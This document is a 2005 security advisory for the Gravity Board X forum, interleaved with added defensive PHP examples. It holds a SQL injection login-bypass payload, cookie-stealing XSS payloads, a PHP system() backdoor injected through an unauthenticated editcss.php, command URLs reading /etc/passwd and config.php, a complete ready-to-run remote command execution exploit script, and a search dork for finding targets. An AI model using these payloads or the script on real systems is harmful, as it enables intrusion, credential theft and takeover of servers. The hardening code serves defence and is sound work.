4.22 07/08/2005
Gravity Board X v1.1 (possibly prior versions)
Remote code execution, SQL injection / login bypass, cross-site scripting, path
disclosure PoC
software:
author site: http://www.gravityboardx.com/
a) Sql Injection / Login Bypass:
A user can bypass the login check and obtain administrator privileges on the target
system:
login: ' or isnull(1/0) /*
password: whatever
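As an added example that is not part of rgod's advisory or of the Gravity Board X code: the pattern the payload above relies on is a login query assembled by string concatenation. The first function is an assumed reconstruction of that pattern (the advisory does not quote the forum's query), the second is the prepared-statement login a maintainer would replace it with. The `users` table and its `username`, `password_hash` and `is_admin` columns are assumptions.

```php
<?php
// Added defensive example; not code from Gravity Board X or from the advisory.
// Assumes a `users` table with columns username, password_hash, is_admin.

// Reconstruction of the vulnerable pattern (assumed; the advisory does not quote
// the forum's query). Both request values are interpolated into the SQL text,
// so  login: ' or isnull(1/0) /*  turns the WHERE clause into
//   username='' or isnull(1/0) /*' AND password='whatever'
// isnull(1/0) is true in MySQL (1/0 evaluates to NULL) and /* comments out the
// remainder, so the query matches every row and whichever user comes back first,
// per the advisory the administrator, is logged in.
function vulnerable_login(mysqli $db, string $user, string $pass): ?array
{
    $sql = "SELECT id, username, is_admin FROM users "
         . "WHERE username='$user' AND password='$pass'";
    $res = $db->query($sql);
    if ($res === false) {
        return null;
    }
    $row = $res->fetch_assoc();
    return is_array($row) ? $row : null;
}

// Hardened replacement: the query text is fixed, user input travels only as a
// bound parameter, and the password is checked against a salted hash in PHP.
function safe_login(mysqli $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, password_hash, is_admin FROM users WHERE username = ? LIMIT 1'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $user);             // the quote and /* in the payload are just bytes here
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();  // get_result() needs the mysqlnd driver
    $stmt->close();

    // password_verify() compares in constant time and reads the salt from the
    // stored hash, so "password: whatever" fails like any other wrong password.
    if (!is_array($row) || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    // Privilege comes from the stored is_admin flag, never from anything in the request.
    $row['is_admin'] = (bool)$row['is_admin'];
    return $row;
}
```

The two controls are independent: binding alone already defeats the quote-and-comment payload, and hashing with `password_verify()` means a leaked database no longer yields working passwords.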
b) Cross site scripting poc:
b.1) After logging in as administrator, an attacker can edit the template to insert malicious
JavaScript code. Try to insert these lines at the end of the template:
</STYLE>
<script>alert(document.cookie)</script>
b.2) A user can craft a malicious URL like this to access the target user's cookies:
http://[target]/[path]/deletethread.php?board_id="><script>alert(document.cookie)</script>
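An added example, not code from Gravity Board X or the advisory, of the two server-side controls that stop the reflected payload above: validating `board_id` as an integer and encoding it for the attribute context on output. It assumes `deletethread.php` echoes `board_id` back into a quoted attribute of a form field, which is what the payload's leading `">` (closing such an attribute) suggests.

```php
<?php
// Added example; not Gravity Board X code. Assumes deletethread.php reflects
// board_id into a quoted attribute of a form field (inferred from the payload).

// Defence in depth against the impact shown (alert(document.cookie)): an
// HttpOnly session cookie cannot be read by script even if an XSS slips through.
// Must be set before session_start().
ini_set('session.cookie_httponly', '1');

// Validation: board_id is a numeric identifier, so accept only a positive integer.
function board_id_or_null(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Output encoding for an attribute context. ENT_QUOTES encodes both ' and ",
// so a leading "> can no longer terminate the attribute and open a tag.
function encode_for_attribute(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Safe rendering of the hidden field: validate first, then encode even the
// validated value. The two controls are independent; either one stops this payload.
function hidden_board_id_field(string $raw): string
{
    $id = board_id_or_null($raw);
    if ($id === null) {
        // Reject instead of reflecting: nothing attacker-controlled reaches the page.
        return '<p>Invalid board id.</p>';
    }
    return '<input type="hidden" name="board_id" value="' . encode_for_attribute((string)$id) . '">';
}

// Constructed inputs: a legitimate id and the advisory's payload.
foreach (['12', '"><script>alert(document.cookie)</script>'] as $input) {
    echo hidden_board_id_field($input), "\n";
    echo encode_for_attribute($input), "\n";   // what encoding alone does to each input
}
```

Running it shows the payload turned into an "Invalid board id" message by validation, and, via the second line, into inert `&quot;&gt;&lt;script&gt;` text by encoding alone.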
c) Remote commands/php code execution:
c.1) By editing the template, an attacker can leave a backdoor on the target system,
for example at the end of the template:
</STYLE>
<?php
error_reporting(0); //to show no errors when page is called normally
system($HTTP_GET_VARS[cmd]);
?>
Afterwards, the attacker can launch commands via these URLs:
http://[target]/[path]/index.php?cmd=ls%20-la
to list directories...
http://[target]/[path]/index.php?cmd=cat%20/etc/passwd
to see Unix /etc/passwd file
http://[target]/[path]/index.php?cmd=cat%20config.php
to see database username/password
c.2) An IMPORTANT NOTE: You can edit the template without being logged in as administrator by calling
the editcss.php script; look at the code of this script:
if($fp = fopen('gbxfinal.css','w')){
fwrite($fp, $csscontent);
fclose($fp);
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php?action=admin">';
}else{
echo 'Gravity Board X was unable to save changes to the CSS template.';
}
A user can easily deface the forum and/or insert a backdoor by calling a URL like this:
http://[target]/[path]/editcss.php?csscontent=</style><?php%20system($HTTP_GET_VARS[cmd]);%20?>
then execute commands:
http://[target]/[path]/index?cmd=[command]
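The `editcss.php` fragment quoted in c.2 has three independent defects: it performs no authentication, it accepts the template from any request (so a single GET link suffices), and it writes whatever it receives into a file that, as c.1 and c.2 show, the forum later executes as PHP. Below is an added hardened version of that save logic; it is not Gravity Board X's own code. The session keys (`user_id`, `is_admin`, `csrf_token`), the `csrf_token` field name and the 64 KiB size limit are assumptions for illustration.

```php
<?php
// Added example, not Gravity Board X's own code: a hardened replacement for the
// editcss.php save logic quoted in the advisory. Session key names, the CSRF
// field name and the size limit are assumptions.
session_start();

const CSS_FILE = __DIR__ . '/gbxfinal.css';
const CSS_MAX_BYTES = 65536;

// 1. The original wrote the file for anyone who called it. Require an
//    authenticated administrator session first.
function is_admin_session(): bool
{
    return !empty($_SESSION['user_id']) && !empty($_SESSION['is_admin']);
}

// 2. Accept the change only via POST with a per-session token, so the one-URL
//    GET from the advisory and a form hosted on another site both fail.
function csrf_token_valid(?string $token): bool
{
    return is_string($token) && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $token);
}

// 3. Validate the content as a stylesheet. Returns null if acceptable, else a reason.
function css_rejection_reason(string $css): ?string
{
    if (strlen($css) > CSS_MAX_BYTES) {
        return 'template too large';
    }
    if (strpos($css, "\0") !== false) {
        return 'binary data in template';
    }
    // '<' has no meaning in CSS, and every payload in the advisory needs it:
    // </STYLE>, <script>, <?php. Rejecting it blocks all three at once.
    if (strpos($css, '<') !== false) {
        return 'markup or PHP tags are not allowed in a stylesheet';
    }
    return null;
}

// 4. Write to a temp file and rename, so a half-written template is never served;
//    LOCK_EX keeps two concurrent saves from interleaving.
function save_css(string $css): bool
{
    $tmp = CSS_FILE . '.tmp';
    if (file_put_contents($tmp, $css, LOCK_EX) === false) {
        return false;
    }
    return rename($tmp, CSS_FILE);
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !is_admin_session()) {
    http_response_code(403);
    exit('Administrator login required.');
}
if (!csrf_token_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid request token.');
}
$css = (string)($_POST['csscontent'] ?? '');
$why = css_rejection_reason($css);
if ($why !== null) {
    http_response_code(400);
    exit('Template rejected: ' . htmlspecialchars($why, ENT_QUOTES, 'UTF-8'));
}
if (save_css($css)) {
    header('Location: index.php?action=admin', true, 303);
} else {
    http_response_code(500);
    echo 'Gravity Board X was unable to save changes to the CSS template.';
}
```

One structural fix sits outside this script: the c.1 and c.2 payloads only run because the forum passes the template through the PHP engine. Delivering `gbxfinal.css` to the browser as a static file via `<link rel="stylesheet" href="gbxfinal.css">`, never through `include`, makes a PHP tag in it inert even if the checks above were bypassed. A production stylesheet editor would additionally restrict `@import` and `url()` targets, which this example leaves out.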
this is my PHP exploit code, run it from Apache:
<?php
/* 4.22 07/08/2005
Gravity Board X v1.1 (possibly prior versions) remote code execution
by rgod
site: http://rgod.altervista.org
make these changes in php.ini if you have troubles
with this script:
allow_call_time_pass_reference = on
register_globals = on */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo '<head><title>Gravity Board X v1.1 remote commands execution</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {color: #00FF00;}
body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
font-style: italic;
}
-->
</style></head>
<body>
<p class="Stile6">Gravity Board X v1.1 (possibly prior versions) remote commands execution</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
<tr>
<td width="43%">
<form name="form1" method="post" action="'.$_SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value">
<p>
<input type="text" name="host">
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>
<p>
<input type="text" name="path">
<span class="Stile5">path (ex: /flatnuke/forum/ or /forum/ just /) </span></p>
<p>
<input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value) </span></p>
<p>
<input type="text" name="command">
<span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>
<p>
<input type="text" name="proxy">
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>
<p>
<input type="submit" name="Submit" value="go!">
</p>
</form></td>
</tr>
</table>
</body>
</html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$htmli=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($htmli)==1) {echo "<td>0".$htmli."</td>";} else
{echo "<td>".$htmli."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
if ($proxy<>'')
{
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);
if ($c==0) {
echo 'check the proxy...<br>';
die;
}
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
//Gravity forum default template
$template='A:link, A:visited, A:active {
TEXT-DECORATION: none; COLOR: #E6B400;
}
A:hover {
TEXT-DECORATION: underline;
}
p {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: transparent;
}
body {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: #101010;
}
/* FONTS */
.headerfont {
FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #DCDCDC;
}
.headerfont2 {
FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
.categoryfont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
.mainlinkfont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #006699;
}
.navfont {
FONT-FAMILY: Arial; FONT-SIZE: 8pt; FONT-WEIGHT: bold; COLOR: #000000;
}
.navheader {
FONT-FAMILY: Tahoma; FONT-SIZE: 14pt; FONT-WEIGHT: bold; COLOR: #000000;
}
.profilefont {
FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px;
}
.small {
FONT-FAMILY: Verdana; FONT-SIZE: 10px;
}
.subjectfont {
FONT-FAMILY: Verdana; FONT-SIZE: 11px; COLOR: #006699;
}
.welcomefont {
FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF;
}
/* MAIN TABLES */
.station {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #222222;
}
.main {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #181818;
}
.post {
BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 0px; BACKGROUND: #202020; BORDER-COLLAPSE: collapse;
}
/* OTHER */
.textbox {
COLOR: #FFFFFF; background: #606060; border: 1px inset #C0C0C0; font-size: 8pt; FONT-FAMILY: Verdana;
}
.button {
COLOR: #FFFFFF; BACKGROUND: #707070; FONT-FAMILY: Verdana; FONT-WEIGHT: bold; BORDER-STYLE: solid; BORDER-COLOR: #999999; BORDER-WIDTH: 2px;
}
/* TABLE CELLS */
.header {
BACKGROUND-IMAGE: url(images/skin/header_dark.gif);
}
.row1 {
BACKGROUND: #303030;
PADDING: 4px;
}
.row2 {
BACKGROUND: #202020;
PADDING: 4px;
}
.row3 {
BACKGROUND: #404040;
PADDING: 4px;
}
.floatrow {
BACKGROUND: #4A4A4A;
PADDING: 4px;
}
.rollover {
BACKGROUND: #808080;
PADDING: 4px;
CURSOR: hand;
}'; //setup new template
if ($port=='') {$port=80;}
$packet="GET ";
if ($proxy<>'') {$packet.="http://".$host;}
$packet.= $path."editcss.php?csscontent=".urlencode($template);
//cut next line to reset template...
$packet.= urlencode("</style><?php error_reporting(0);system(".'$HTTP_GET_VARS[cmd]'."); ?>");
$packet.=" HTTP/1.0\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
if (!$ock) {echo 'Not connected to target...'; die;}
//debugging...
show($packet);
fputs($ock,$packet);
fclose($ock);
$packet="GET ";
if ($proxy<>'') {$packet.="http://".$host;}
$packet.=$path."index.php?cmd=".urlencode($command)." HTTP/1.0\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
if (!$ock) {echo 'Not connected to target...'; die;}
//debugging...
show($packet);
fputs($ock,$packet);
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
fclose($ock);
echo "If Gravity Forum is unpatched and vulnerable, now you will see ".htmlentities($command)." output inside html...<br>";
echo nl2br(htmlentities($html));
}
?>
It's also possible to disclose the installation path:
d) path disclosure:
http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path]/ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[target]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php
and so on... by calling the scripts in the /forms directory
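An added example, not code from Gravity Board X, of how a PHP application keeps its install path out of responses to direct calls like those listed above. The advisory does not say what the scripts print; this example assumes the usual cause for this class of finding, a PHP warning or notice (undefined variable, failed include) that embeds the absolute path when a sub-script is requested outside its normal entry point. The file name `common.php`, the `IN_GBX` marker and the log location are assumptions.

```php
<?php
// Added example; not Gravity Board X code. Assumes the disclosed path comes from a
// PHP warning/notice emitted when a sub-script is called directly (assumption).
// This file stands for a common.php included first by every real entry point.

// Diagnostics go to a log outside the web root, never into the HTTP response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', dirname(__DIR__) . '/logs/php_errors.log'); // assumed location
error_reporting(E_ALL);

// Marker that only a real entry point (index.php and friends) sets.
define('IN_GBX', true);

// Warnings and notices are routed to the log instead of being printed, so an
// undefined variable in ban.php can no longer leak "/home/.../forum/ban.php".
set_error_handler(function (int $no, string $msg, string $file, int $line): bool {
    error_log(sprintf('PHP error %d: %s in %s:%d', $no, $msg, $file, $line));
    return true; // handled; suppress PHP's default output
});

// Catch-all for anything that still escapes: generic text to the user, the
// detail (message, file path, line) only to the log.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('%s: %s in %s:%d', get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});

// The companion line belongs at the very top of every sub-script (ban.php,
// addnews.php, forms/banform.php, ...), before any code that could fail. A direct
// request never reaches that code and gets a plain 404 instead:
//
//   if (!defined('IN_GBX')) { http_response_code(404); exit; }
```

With both pieces in place a direct call to any script in the list yields a bare 404, and a genuine fault elsewhere produces a generic 500 with the path recorded only server-side.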
googledork: "Powered by Gravity Board"
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://www.rgod.altervista.org/gravity.html